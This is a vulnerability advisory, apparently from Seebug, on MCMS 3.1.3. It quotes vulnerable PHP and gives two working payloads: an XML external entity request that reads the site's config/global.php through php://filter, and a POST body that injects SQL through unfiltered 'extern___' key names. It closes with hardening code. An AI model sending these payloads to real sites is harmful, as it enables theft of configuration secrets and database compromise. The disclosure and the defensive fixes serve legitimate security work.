MCMS 3.1.3 (latest version) SQL injection and arbitrary file read

2015-03-20T00:00:00
ID SSV:95217
Type seebug
Reporter Root
Modified 2015-03-20T00:00:00

Description

Brief description:

See title.

Details:

First, the arbitrary file read. For the earlier submission, WooYun: mcms v3.1.0 sql注入+任意文件读取 (MCMS v3.1.0 SQL injection + arbitrary file read), the vendor's fix was:

```php
$wx=new weixin();
// lines added by the vendor's fix
$_GET = H::sqlxss($_GET);
$_POST = H::sqlxss($_POST);
...........
function response_msg(){
    global $dbm,$C;
    $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

    if(!empty($postStr)){
        // raw request body is handed straight to the XML parser
        $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
        $fromUsername = $postObj->FromUserName;
        $toUsername = $postObj->ToUserName;
...
        $keyword = trim($postObj->Content);
        // also added by the vendor's fix
        $keyword = H::sqlxss($keyword);
```

They added these lines: `$_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); $keyword = H::sqlxss($keyword);`. That stops the injection, but arbitrary file read still works. POST:

```http
POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: text/xml
Content-Length: 262

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>a\</Content>
</xml>
```

![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)

![2.png](https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png)

Now the injection. D:/wamp/www/app/user/info.php

```php
function m__save(){
    global $dbm,$C,$V;
    $_POST['info_body']=strip_tags($_POST['info_body'], ' <p><a><img>');
    // only the POST values are filtered, not the key names
    $_POST=H::sqlxss($_POST);
    // process attachment parameters
    $attach= $oname = $order = $model_fields = array();
    foreach($_POST as $k=>$v){
        if(substr($k,0,9)=='attach___'){
            $attach[$v]=$v;
            $oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]);
            $order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]);
        }
        if (substr($k,0,9)=='extern___') {
            // fill extension table fields: the unfiltered key name becomes the array key
            $model_fields[substr($k,9)] = $v;
        }
    }
    ......
    if($fields['model_name']!=''){
        $model_fields['info_id']=$info_id;
        // pre-process certain values, e.g. dates
        foreach($model_fields as $k=>$v) {
            // $k (the POST key name) is concatenated straight into the query
            $sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1";
```

Because the key names are not filtered, injection is possible. POST:

```
info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1
```

![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)

You can see the single quote gets through. Time-based blind injection is possible.
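Both fixes in one place, as an added example that is not MCMS's own code: a parser for the WeChat callback body that refuses DOCTYPE/ENTITY declarations and never turns on entity substitution, plus a `form_type` lookup that only accepts identifier-shaped extension field names and binds both values instead of concatenating them. The function names and the PDO handle are assumptions; `TB_PRE` is the table-prefix constant from the page, with a placeholder value.

```php
<?php
// Added hardening example, not MCMS code. Function names and the PDO
// handle are assumptions; TB_PRE is the page's table prefix constant.
defined('TB_PRE') || define('TB_PRE', 'prefix_'); // placeholder prefix

// Parse the WeChat callback body without letting libxml resolve external
// entities, so a php://filter or file:// reference in a DOCTYPE goes nowhere.
function parse_wx_message(string $postStr): ?SimpleXMLElement
{
    // A genuine WeChat push never carries a DOCTYPE; reject one outright.
    if (stripos($postStr, '<!DOCTYPE') !== false || stripos($postStr, '<!ENTITY') !== false) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true); // PHP 8 disables the loader by default
    }
    libxml_use_internal_errors(true);
    // Never add LIBXML_NOENT here: that flag is what enables entity substitution.
    $obj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    return $obj === false ? null : $obj;
}

const FIELD_NAME_RE = '/^[A-Za-z_][A-Za-z0-9_]{0,63}$/';

// Collect extern___ keys the way m__save() does, but drop any key name
// that is not a plain identifier before it can reach a query.
function collect_model_fields(array $post): array
{
    $fields = [];
    foreach ($post as $k => $v) {
        if (substr($k, 0, 9) === 'extern___' && preg_match(FIELD_NAME_RE, substr($k, 9))) {
            $fields[substr($k, 9)] = $v;
        }
    }
    return $fields; // "extern___test 'sql..." never makes it into this array
}

// The form_type lookup with both values bound rather than concatenated.
function lookup_form_type(PDO $pdo, string $modelName, string $fieldName): ?string
{
    if (!preg_match(FIELD_NAME_RE, $fieldName)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT form_type FROM ' . TB_PRE . 'model_fields'
        . ' WHERE model_name = ? AND field_name = ? LIMIT 1');
    $stmt->execute([$modelName, $fieldName]);
    $type = $stmt->fetchColumn();
    return $type === false ? null : (string) $type;
}
```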

Proof of vulnerability:

![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)

![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)